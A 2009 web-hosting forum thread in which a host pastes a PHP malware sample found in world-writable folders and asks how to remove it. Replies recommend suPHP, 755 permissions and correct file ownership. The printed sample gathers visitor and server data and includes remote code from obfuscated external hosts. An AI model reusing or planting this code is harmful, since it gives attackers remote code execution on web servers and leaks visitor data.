Results 1 to 15 of 15
-
07-24-2009, 05:37 AM #1Web Hosting Master
- Join Date
- Nov 2007
- Location
- India
- Posts
- 843
777 folders are got affected by the following code
777 folders are got affected by the following code
PHP Code:class newhttp{
var $fullurl; var $p_url; var $conn_id; var $flushed; var $mode = 4; var $defmode; var $redirects = 0; var $binary; var $options; var $stat = array('dev' => 0,'ino' => 0,'mode' => 0,'nlink' => 1,'uid' => 0,'gid' => 0,'rdev' => -1,'size' => 0,'atime' => 0,'mtime' => 0,'ctime' => 0,'blksize' => -1,'blocks' => 0);
function error($msg='not connected') { if ($this->options & STREAM_REPORT_ERRORS) { trigger_error($msg, E_USER_WARNING); } return false; }
function stream_open($path, $mode, $options, $opened_path) { $this->fullurl = $path; $this->options = $options; $this->defmode = $mode; $url = parse_url($path); if (empty($url['host'])) { return $this->error('missing host name'); } $this->conn_id = fsockopen($url['host'], (empty($url['port']) ? 80 : intval($url['port'])), $errno, $errstr, 2); if (!$this->conn_id) { return false; } if (empty($url['path'])) { $url['path'] = '/'; } $this->p_url = $url; $this->flushed = false; if ($mode[0] != 'r' || (strpos($mode, '+') !== false)) { $this->mode += 2; } $this->binary = (strpos($mode, 'b') !== false); $c = $this->context(); if (!isset($c['method'])) { stream_context_set_option($this->context, 'http', 'method', 'GET'); } if (!isset($c['header'])) { stream_context_set_option($this->context, 'http', 'header', ''); } if (!isset($c['user_agent'])) { stream_context_set_option($this->context, 'http', 'user_agent', ini_get('user_agent')); } if (!isset($c['content'])) { stream_context_set_option($this->context, 'http', 'content', ''); } if (!isset($c['max_redirects'])) { stream_context_set_option($this->context, 'http', 'max_redirects', 5); } return true; }
function stream_close() { if ($this->conn_id) { fclose($this->conn_id); $this->conn_id = null; } }
function stream_read($bytes) { if (!$this->conn_id) { return $this->error(); } if (!$this->flushed && !$this->stream_flush()) { return false; } if (feof($this->conn_id)) { return ''; } $bytes = max(1,$bytes); if ($this->binary) { return fread($this->conn_id, $bytes); } else { return fgets($this->conn_id, $bytes); } }
function stream_write($data) { if (!$this->conn_id) { return $this->error(); } if (!$this->mode & 2) { return $this->error('Stream is in read-only mode'); } $c = $this->context(); stream_context_set_option($this->context, 'http', 'method', (($this->defmode[0] == 'x') ? 'PUT' : 'POST')); if (stream_context_set_option($this->context, 'http', 'content', $c['content'].$data)) { return strlen($data); } return 0; }
function stream_eof() { if (!$this->conn_id) { return true; } if (!$this->flushed) { return false; } return feof($this->conn_id); }
function stream_seek($offset, $whence) { return false; }
function stream_tell() { return 0; }
function stream_flush() { if ($this->flushed) { return false; } if (!$this->conn_id) { return $this->error(); } $c = $this->context(); $this->flushed = true; $RequestHeaders = array($c['method'].' '.$this->p_url['path'].(empty($this->p_url['query']) ? '' : '?'.$this->p_url['query']).' HTTP/1.0', 'HOST: '.$this->p_url['host'], 'User-Agent: '.$c['user_agent'].' StreamReader' ); if (!empty($c['header'])) { $RequestHeaders[] = $c['header']; } if (!empty($c['content'])) { if ($c['method'] == 'PUT') { $RequestHeaders[] = 'Content-Type: '.($this->binary ? 'application/octet-stream' : 'text/plain'); } else { $RequestHeaders[] = 'Content-Type: application/x-www-form-urlencoded'; } $RequestHeaders[] = 'Content-Length: '.strlen($c['content']); } $RequestHeaders[] = 'Connection: close'; if (fwrite($this->conn_id, implode("\r\n", $RequestHeaders)."\r\n\r\n") === false) { return false; } if (!empty($c['content']) && fwrite($this->conn_id, $c['content']) === false) { return false; } global $http_response_header; $http_response_header = fgets($this->conn_id, 300); $data = rtrim($http_response_header); preg_match('#.* ([0-9]+) (.*)#i', $data, $head); if (($head[1] >= 301 && $head[1] <= 303) || $head[1] == 307) { $data = rtrim(fgets($this->conn_id, 300)); while (!empty($data)) { if (strpos($data, 'Location: ') !== false) { $new_location = trim(str_replace('Location: ', '', $data)); break; } $data = rtrim(fgets($this->conn_id, 300)); } trigger_error($this->fullurl.' '.$head[2].': '.$new_location, E_USER_NOTICE); $this->stream_close(); return ($c['max_redirects'] > $this->redirects++ && $this->stream_open($new_location, $this->defmode, $this->options, null) && $this->stream_flush()); } $data = rtrim(fgets($this->conn_id, 1024)); while (!empty($data)) { $http_response_header .= $data."\r\n"; if (strpos($data,'Content-Length: ') !== false) { $this->stat['size'] = trim(str_replace('Content-Length: ', '', $data)); } elseif (strpos($data,'Date: ') !== false) { $this->stat['atime'] = strtotime(str_replace('Date: ', '', $data)); } elseif (strpos($data,'Last-Modified: ') !== false) { $this->stat['mtime'] = strtotime(str_replace('Last-Modified: ', '', $data)); } $data = rtrim(fgets($this->conn_id, 1024)); } if ($head[1] >= 400) { trigger_error($this->fullurl.' '.$head[2], E_USER_WARNING); return false; } if ($head[1] == 304) { trigger_error($this->fullurl.' '.$head[2], E_USER_NOTICE); return false; } return true; }
function stream_stat() { $this->stream_flush(); return $this->stat; }
function dir_opendir($path, $options) { return false; }
function dir_readdir() { return ''; }
function dir_rewinddir() { return ''; }
function dir_closedir() { return; }
function url_stat($path, $flags) { return array(); }
function context() { if (!$this->context) { $this->context = stream_context_create(); } $c = stream_context_get_options($this->context); return (isset($c['http']) ? $c['http'] : array()); }
}$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";$rkht=1;
if(version_compare(PHP_VERSION,'5.2','>=')){if(ini_get('allow_url_include')){$rkht=1;}else{$rkht=0;}}
if($rkht==1){if(ini_get('allow_url_fopen')){$rkht=1;}else{$rkht=0;}}
if($rkht==1){if ((include(base64_decode("aHR0cDovLw==").$p.base64_decode("LnVzZXJzLnBocGZyZWUucnU=").'/?'.$str.'.0'))){}
else {include(base64_decode("aHR0cDovLw==").$p.base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==").'/?'.$str.'.1');}
}
else{stream_wrapper_register('http2','newhttp');
if ((include(base64_decode("aHR0cDI6Ly8=").$p.base64_decode("LnVzZXJzLnBocGZyZWUucnU=").'/?'.$str.'.2'))){}
else {include(base64_decode("aHR0cDI6Ly8=").$p.base64_decode("LnVzZXJzLnBocGNvZGluZy5ydQ==").'/?'.$str.'.3');}
}
now how i should remove that and how to make safe the 777 folder
but i can able to make the folder 755,but some thing not working in 755
please advise meHostNotch Hosting Services 99.9% uptime Shared Hosting, Reseller Hosting
yajur | Sales Team
CPanel Hosting • R1 Soft • Offsite-Backup • Great Uptime
http://hostnotch.com sales @ hostnotch.com
-
07-24-2009, 05:57 AM #2Web Hosting Master
- Join Date
- Oct 2004
- Location
- root
- Posts
- 874
█ Nick | BudgetVM
█ 1G | 10G | 40G | 100G Baremetal Servers
█ Featuring Best in Class - In House DDOS Protection - No Voxility
█
-
07-24-2009, 06:03 AM #3Web Hosting Master
- Join Date
- Nov 2007
- Location
- India
- Posts
- 843
using suphp?
but if i activate suphp then some folder may show internal server errorHostNotch Hosting Services 99.9% uptime Shared Hosting, Reseller Hosting
yajur | Sales Team
CPanel Hosting • R1 Soft • Offsite-Backup • Great Uptime
http://hostnotch.com sales @ hostnotch.com
-
07-24-2009, 06:55 AM #4Web Hosting Master
- Join Date
- Jun 2003
- Location
- World Wide Web
- Posts
- 581
Hi yajur,
Compiling php as suphp will prevent this type of activities.
" but if i activate suphp then some folder may show internal server error "
Yes , Suphp will give internal server error if any of the folders or files having 777 permissions. The same thing happen if you are declaring php variables using .htaccess. For that you need to create custom php.iniSupportExpertz.com - the name says it all!
Managed Cloud Servers
Server Management and Monitoring
24x7 outsourced customer support
-
07-24-2009, 06:56 AM #5Total Nerd
- Join Date
- Feb 2007
- Location
- Florida
- Posts
- 1,932
Why are so many people putting unsecured servers into production?
-Joe @ Secure Dragon LLC.
+ OpenVZ Powered by Wyvern | KVM | cPanel Hosting | Backup VPSs | LowEndBoxes | DDOS Protection
+ Florida | Colorado | Illinois | California | Oregon | Georgia | New Jersey | Arizona | Texas
-
07-24-2009, 07:00 AM #6Junior Guru
- Join Date
- Mar 2009
- Location
- Rocky Face, GA
- Posts
- 196
Michael T. @ Resellr.Net - CEO
The Premier Reseller Hosting Solution
Visit Us @ Resellr.Net | Follow Resellr.Net on Twitter
-
07-24-2009, 07:32 AM #7Web Hosting Master
- Join Date
- Nov 2007
- Location
- India
- Posts
- 843
HostNotch Hosting Services 99.9% uptime Shared Hosting, Reseller Hosting
yajur | Sales Team
CPanel Hosting • R1 Soft • Offsite-Backup • Great Uptime
http://hostnotch.com sales @ hostnotch.com
-
07-24-2009, 08:05 AM #8Eternal Learner
- Join Date
- Jul 2007
- Posts
- 2,051
777 is the worst thing to do. It will expose your scripts to attacks.
Prashant T.
Don't run after Success. Run after Excellence and Success will soon follow.
-
07-24-2009, 09:13 AM #9Junior Guru Wannabe
- Join Date
- Jan 2008
- Posts
- 84
-
07-24-2009, 10:57 AM #10Randy
- Join Date
- Aug 2006
- Location
- Ashburn VA, San Diego CA
- Posts
- 4,615
as others stated, suphp and correct permissions are your answer. If you use Cpanel, here's a couple hints I documented:
Part 1 - permissions:
http://djlab.com/2009/06/cpanel-suph...l-folders-755/
Part 2 - ownership:
http://djlab.com/2009/06/cpanel-suph...ership-issues/Fast Serv Networks, LLC | AS29889 | DDOS Protected | Managed Cloud, Streaming, Dedicated Servers, Colo by-the-U
Since 2003 - Ashburn VA + San Diego CA Datacenters
-
07-24-2009, 12:00 PM #11Web Hosting Master
- Join Date
- Nov 2007
- Location
- India
- Posts
- 843
HostNotch Hosting Services 99.9% uptime Shared Hosting, Reseller Hosting
yajur | Sales Team
CPanel Hosting • R1 Soft • Offsite-Backup • Great Uptime
http://hostnotch.com sales @ hostnotch.com
-
07-24-2009, 12:02 PM #12Randy
- Join Date
- Aug 2006
- Location
- Ashburn VA, San Diego CA
- Posts
- 4,615
Check ownership (part 2). All files/folders must be owned by site owner, and NOT apache, root, ect.
Fast Serv Networks, LLC | AS29889 | DDOS Protected | Managed Cloud, Streaming, Dedicated Servers, Colo by-the-U
Since 2003 - Ashburn VA + San Diego CA Datacenters
-
07-24-2009, 12:04 PM #13Web Hosting Master
- Join Date
- Apr 2003
- Location
- San Jose, CA.
- Posts
- 1,624
Blah...
suphp is an option... not a very good one as it will help with your problem while causing completely different problems.
mpm_peruser or mpm_itk will help with your problem without causing the problems suphp will.
-
07-24-2009, 03:23 PM #14Randy
- Join Date
- Aug 2006
- Location
- Ashburn VA, San Diego CA
- Posts
- 4,615
The issues people have with suphp are problems that already exist prior to installing it. Insecure permissions..plain and simple. Suphp is protecting you from your own mistakes by giving 500 errors.
If you utilize chmod/chown scripts after installing suphp on an existing server that was running mod_php, or just install it on a clean server, you won't have these issues.
Changing to a different mpm is not a solution I'd recommend to others. mpm_prefork is all I would trust in a busy environment.Fast Serv Networks, LLC | AS29889 | DDOS Protected | Managed Cloud, Streaming, Dedicated Servers, Colo by-the-U
Since 2003 - Ashburn VA + San Diego CA Datacenters
-
07-24-2009, 10:18 PM #15Web Hosting Guru
- Join Date
- Jun 2004
- Location
- Ontario Canada
- Posts
- 259
Similar Threads
-
Have you been affected by the floods?
By VWH-Troy in forum Web Hosting LoungeReplies: 13Last Post: 08-03-2007, 06:05 AM -
Los Angeles Down - Which DCs are Affected
By thecloudguy in forum Providers and Network Outages and UpdatesReplies: 8Last Post: 09-13-2005, 01:40 AM -
WHT, how has it affected your sales ?
By mytrade in forum Running a Web Hosting BusinessReplies: 24Last Post: 01-08-2005, 02:46 AM -
webreseller affected?
By goodness0001 in forum Dedicated ServerReplies: 15Last Post: 08-15-2003, 02:13 AM -
Have you ever been affected by SPEWS?
By Joshua in forum Dedicated ServerReplies: 7Last Post: 05-22-2003, 03:50 AM